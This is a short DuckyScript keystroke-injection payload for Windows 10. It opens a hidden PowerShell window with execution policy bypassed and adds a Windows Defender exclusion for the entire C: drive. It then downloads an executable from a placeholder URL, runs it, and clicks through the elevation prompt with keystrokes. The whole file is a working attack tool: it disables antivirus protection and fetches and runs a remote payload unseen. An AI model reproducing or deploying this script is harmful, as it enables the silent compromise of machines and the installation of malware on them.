REM Title: Add Windows Defender Exclusion
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Add Windows Defender Exclusion for C:/ drive.
REM Target: Windows 10

REM *SETUP*
REM replace FILE_URL_HERE with the url of your file to run.

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C Add-MpPreference -ExclusionPath C:/

REM replace FILE_URL_HERE below.
STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit

CTRL-SHIFT ENTER
DELAY 3000
ALT y
